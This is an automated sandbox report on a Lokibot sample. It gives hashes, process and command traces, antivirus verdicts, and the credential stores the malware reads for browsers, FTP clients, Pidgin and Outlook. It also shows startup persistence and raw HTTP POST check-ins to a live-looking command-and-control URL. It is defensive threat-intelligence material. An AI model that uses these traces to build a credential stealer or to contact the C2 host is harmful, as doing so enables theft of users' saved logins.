1
2* MalFamily: "Lokibot"
3
4* MalScore: 10.0
5
6* File Name: "00227804"
7* File Size: 886272
8* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
9* SHA256: "a3f3cddf09f10ff782a96be311c767e336b25af010d0720a9a8e8a275bb6f37a"
10* MD5: "a33526b80aed53c525834a15dff6f486"
11* SHA1: "82d64786027ab8db5ee5f738b1f1b8e487a1cd89"
12* SHA512: "d5ba382c396a85dafc00a8493b6a653767eb494d4063a37e576bb5c6243913a49957350eb872c63cde74bda9854fb44888ded2dc4546c9b9e390da5a717aa13b"
13* CRC32: "EF9A6D71"
14* SSDEEP: "12288:j8MI3z8rANQUWpBZY6vcxDyJaOBXS7DGCAhGFgZahbCk9DclCbXuFF+zdxNL:E3uANjWpNCD4lRS1KZC9XuwjNL"
15
16* Process Execution:
17 "00227804.exe",
18 "odjf.exe",
19 "odjf.exe",
20 "services.exe",
21 "lsass.exe",
22 "sdclt.exe",
23 "taskhost.exe",
24 "sc.exe",
25 "svchost.exe",
26 "svchost.exe",
27 "WerFault.exe",
28 "wermgr.exe",
29 "svchost.exe",
30 "WerFault.exe",
31 "wermgr.exe"
32
33
34* Executed Commands:
35 "\"C:\\Users\\user\\AppData\\Roaming\\ndiso\\odjf.exe\"",
36 "C:\\Windows\\system32\\lsass.exe",
37 "C:\\Windows\\System32\\sdclt.exe /CONFIGNOTIFICATION",
38 "taskhost.exe $(Arg0)",
39 "C:\\Windows\\system32\\sc.exe start w32time task_started",
40 "C:\\Windows\\system32\\svchost.exe -k LocalService",
41 "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
42 "C:\\Windows\\system32\\WerFault.exe -u -p 3060 -s 288",
43 "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\"",
44 "C:\\Windows\\system32\\WerFault.exe -u -p 1056 -s 108",
45 "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\""
46
47
48* Signatures Detected:
49
50 "Description": "At least one process apparently crashed during execution",
51 "Details":
52
53
54 "Description": "Creates RWX memory",
55 "Details":
56
57
58 "Description": "A process attempted to delay the analysis task.",
59 "Details":
60
61 "Process": "odjf.exe tried to sleep 1275 seconds, actually delayed analysis time by 0 seconds"
62
63
64
65
66 "Description": "HTTP traffic contains suspicious features which may be indicative of malware-related traffic",
67 "Details":
68
69 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
70
71
72 "http_version_old": "HTTP traffic uses version 1.0"
73
74
75 "suspicious_request": "http://waiptxin.eu/sleek2/cat.php"
76
77
78
79
80 "Description": "Performs some HTTP requests",
81 "Details":
82
83 "url": "http://waiptxin.eu/sleek2/cat.php"
84
85
86
87
88 "Description": "Executed a process and injected code into it, probably while unpacking",
89 "Details":
90
91 "Injection": "odjf.exe(1792) -> odjf.exe(1328)"
92
93
94
95
96 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
97 "Details":
98
99 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13907803 times"
100
101
102
103
104 "Description": "Steals private information from local Internet browsers",
105 "Details":
106
107 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
108
109
110
111
112 "Description": "Installs itself for autorun at Windows startup",
113 "Details":
114
115 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ndiso.vbs"
116
117
118 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ndiso.vbs"
119
120
121
122
123 "Description": "Creates a hidden or system file",
124 "Details":
125
126 "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
127
128
129 "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
130
131
132
133
134 "Description": "File has been identified by 42 Antiviruses on VirusTotal as malicious",
135 "Details":
136
137 "MicroWorld-eScan": "Trojan.Agent.EAZY"
138
139
140 "McAfee": "Fareit-FOZ!A33526B80AED"
141
142
143 "Cylance": "Unsafe"
144
145
146 "K7AntiVirus": "Riskware ( 0040eff71 )"
147
148
149 "Alibaba": "Backdoor:Win32/LokiBot.6e2b0742"
150
151
152 "K7GW": "Riskware ( 0040eff71 )"
153
154
155 "Cybereason": "malicious.6027ab"
156
157
158 "F-Prot": "W32/Fareit.DDQ"
159
160
161 "Symantec": "Trojan.Gen.MBT"
162
163
164 "APEX": "Malicious"
165
166
167 "Paloalto": "generic.ml"
168
169
170 "GData": "Trojan.Agent.EAZY"
171
172
173 "Kaspersky": "HEUR:Backdoor.Win32.Androm.gen"
174
175
176 "BitDefender": "Trojan.Agent.EAZY"
177
178
179 "Avast": "Win32:Malware-gen"
180
181
182 "Endgame": "malicious (high confidence)"
183
184
185 "Sophos": "Mal/Fareit-V"
186
187
188 "DrWeb": "Trojan.PWS.Stealer.19347"
189
190
191 "Invincea": "heuristic"
192
193
194 "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.ch"
195
196
197 "FireEye": "Generic.mg.a33526b80aed53c5"
198
199
200 "Emsisoft": "Trojan.Agent.EAZY (B)"
201
202
203 "SentinelOne": "DFI - Suspicious PE"
204
205
206 "Cyren": "W32/Fareit.TLGU-5258"
207
208
209 "Webroot": "W32.Trojan.Gen"
210
211
212 "Arcabit": "Trojan.Agent.EAZY"
213
214
215 "AegisLab": "Trojan.Win32.Androm.m!c"
216
217
218 "ZoneAlarm": "HEUR:Backdoor.Win32.Androm.gen"
219
220
221 "Microsoft": "Trojan:Win32/LokiBot.DW!MTB"
222
223
224 "AhnLab-V3": "Win-Trojan/Delphiless.Exp"
225
226
227 "Acronis": "suspicious"
228
229
230 "VBA32": "BScope.Trojan.Kryptik"
231
232
233 "MAX": "malware (ai score=100)"
234
235
236 "Ad-Aware": "Trojan.Agent.EAZY"
237
238
239 "Malwarebytes": "Trojan.MalPack.DLF"
240
241
242 "ESET-NOD32": "a variant of Win32/Injector.EGTX"
243
244
245 "TrendMicro-HouseCall": "TrojanSpy.Win32.LOKI.SMDD.hp"
246
247
248 "Rising": "Trojan.Injector!1.AF18 (CLASSIC)"
249
250
251 "Ikarus": "Trojan.Win32.Injector"
252
253
254 "Fortinet": "W32/Injector.EGKJ!tr"
255
256
257 "AVG": "Win32:Malware-gen"
258
259
260 "CrowdStrike": "win/malicious_confidence_100% (W)"
261
262
263
264
265 "Description": "Checks the system manufacturer, likely for anti-virtualization",
266 "Details":
267
268
269 "Description": "Creates a copy of itself",
270 "Details":
271
272 "copy": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
273
274
275
276
277 "Description": "Harvests credentials from local FTP client software",
278 "Details":
279
280 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
281
282
283 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
284
285
286 "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
287
288
289 "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
290
291
292 "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
293
294
295 "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
296
297
298 "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
299
300
301 "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
302
303
304 "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
305
306
307 "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
308
309
310
311
312 "Description": "Harvests information related to installed instant messenger clients",
313 "Details":
314
315 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
316
317
318
319
320 "Description": "Harvests information related to installed mail clients",
321 "Details":
322
323 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
324
325
326 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
327
328
329 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
330
331
332 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
333
334
335 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
336
337
338 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
339
340
341 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
342
343
344 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
345
346
347 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
348
349
350 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
351
352
353 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
354
355
356 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
357
358
359 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
360
361
362 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
363
364
365 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
366
367
368 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
369
370
371 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
372
373
374 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
375
376
377 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
378
379
380 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
381
382
383 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
384
385
386 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
387
388
389 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
390
391
392 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
393
394
395 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
396
397
398 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
399
400
401 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
402
403
404 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
405
406
407 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
408
409
410 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
411
412
413 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
414
415
416 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
417
418
419 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
420
421
422 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
423
424
425 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
426
427
428
429
430 "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
431 "Details":
432
433 "file": "C:\\Users\\user\\AppData\\Roaming\\ndiso\\odjf.exe:ZoneIdentifier"
434
435
436
437
438 "Description": "Collects information to fingerprint the system",
439 "Details":
440
441
442 "Description": "Anomalous binary characteristics",
443 "Details":
444
445 "anomaly": "Timestamp on binary predates the release date of the OS version it requires by at least a year"
446
447
448
449
450 "Description": "Created network traffic indicative of malicious activity",
451 "Details":
452
453 "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
454
455
456 "signature": "ET TROJAN LokiBot Fake 404 Response"
457
458
459 "signature": "ET TROJAN LokiBot Checkin"
460
461
462 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
463
464
465 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
466
467
468 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
469
470
471 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
472
473
474
475
476
477* Started Service:
478 "VaultSvc",
479 "WerSvc",
480 "W32Time"
481
482
483* Mutexes:
484 "6EFA73A4746045B65DEE781E",
485 "Local\\WERReportingForProcess3060",
486 "Global\\\\xe5\\x88\\x90\\xc2\\x9d",
487 "Global\\\\xed\\x95\\xb0\\xc7\\xa6",
488 "WERUI_BEX64-30ff788d55c8dd8e13e51cbc4a41a06fb37b455",
489 "Local\\WERReportingForProcess1056",
490 "Global\\\\xe5\\x88\\x90\\xc2\\x8d",
491 "Global\\\\xed\\x99\\xb0\\xc7\\x88",
492 "WERUI_APPCRASH-5c9dc22e27dc86b7ce5726e7d9b5fc15b4163"
493
494
495* Modified Files:
496 "C:\\Users\\user\\AppData\\Roaming\\ndiso\\odjf.exe",
497 "C:\\Users\\user\\AppData\\Roaming\\ndiso\\odjf.exe:ZoneIdentifier",
498 "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ndiso.vbs",
499 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
500 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe",
501 "C:\\Windows\\sysnative\\LogFiles\\Scm\\2ce1541b-c7b1-4ba0-8974-722d18a3c54d",
502 "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
503 "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
504 "C:\\Windows\\sysnative\\LogFiles\\Scm\\4e6828f4-11de-47bf-b7df-2249f4bdea4e",
505 "\\??\\PIPE\\lsarpc",
506 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB463.tmp.appcompat.txt",
507 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB771.tmp.WERInternalMetadata.xml",
508 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB791.tmp.hdmp",
509 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD7E.tmp.mdmp",
510 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\WERB463.tmp.appcompat.txt",
511 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\WERB771.tmp.WERInternalMetadata.xml",
512 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\WERB791.tmp.hdmp",
513 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\WERBD7E.tmp.mdmp",
514 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\Report.wer",
515 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\Report.wer.tmp",
516 "C:\\Windows\\Temp\\WERA006.tmp.appcompat.txt",
517 "C:\\Windows\\Temp\\WERA065.tmp.WERInternalMetadata.xml",
518 "C:\\Windows\\Temp\\WERA0E3.tmp.hdmp",
519 "C:\\Windows\\Temp\\WERAAD7.tmp.mdmp",
520 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\WERA006.tmp.appcompat.txt",
521 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\WERA065.tmp.WERInternalMetadata.xml",
522 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\WERA0E3.tmp.hdmp",
523 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\WERAAD7.tmp.mdmp",
524 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\Report.wer",
525 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\Report.wer.tmp"
526
527
528* Deleted Files:
529 "C:\\Users\\user\\AppData\\Roaming\\ndiso\\odjf.exe",
530 "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ndiso.vbs",
531 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
532 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB463.tmp",
533 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB463.tmp.appcompat.txt",
534 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB771.tmp",
535 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB771.tmp.WERInternalMetadata.xml",
536 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB791.tmp",
537 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB791.tmp.hdmp",
538 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD7E.tmp",
539 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD7E.tmp.mdmp",
540 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\Report.wer.tmp",
541 "C:\\Windows\\Temp\\WERA006.tmp",
542 "C:\\Windows\\Temp\\WERA006.tmp.appcompat.txt",
543 "C:\\Windows\\Temp\\WERA065.tmp",
544 "C:\\Windows\\Temp\\WERA065.tmp.WERInternalMetadata.xml",
545 "C:\\Windows\\Temp\\WERA0E3.tmp",
546 "C:\\Windows\\Temp\\WERA0E3.tmp.hdmp",
547 "C:\\Windows\\Temp\\WERAAD7.tmp",
548 "C:\\Windows\\Temp\\WERAAD7.tmp.mdmp",
549 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\Report.wer.tmp"
550
551
552* Modified Registry Keys:
553 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
554 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
555 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
556 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
557 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
558 "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
559 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\ExceptionRecord",
560 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
561 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
562 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
563 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
564 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation"
565
566
567* Deleted Registry Keys:
568
569* DNS Communications:
570
571 "type": "A",
572 "request": "waiptxin.eu",
573 "answers":
574
575 "data": "47.254.214.55",
576 "type": "A"
577
578
579
580
581
582* Domains:
583
584 "ip": "47.254.214.55",
585 "domain": "waiptxin.eu"
586
587
588
589* Network Communication - ICMP:
590
591* Network Communication - HTTP:
592
593 "count": 2,
594 "body": "",
595 "uri": "http://waiptxin.eu/sleek2/cat.php",
596 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
597 "method": "POST",
598 "host": "waiptxin.eu",
599 "version": "1.0",
600 "path": "/sleek2/cat.php",
601 "data": "POST /sleek2/cat.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: waiptxin.eu\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C6C7D52C\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
602 "port": 80
603
604
605 "count": 21,
606 "body": "",
607 "uri": "http://waiptxin.eu/sleek2/cat.php",
608 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
609 "method": "POST",
610 "host": "waiptxin.eu",
611 "version": "1.0",
612 "path": "/sleek2/cat.php",
613 "data": "POST /sleek2/cat.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: waiptxin.eu\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C6C7D52C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
614 "port": 80
615
616
617
618* Network Communication - SMTP:
619
620* Network Communication - Hosts:
621
622* Network Communication - IRC: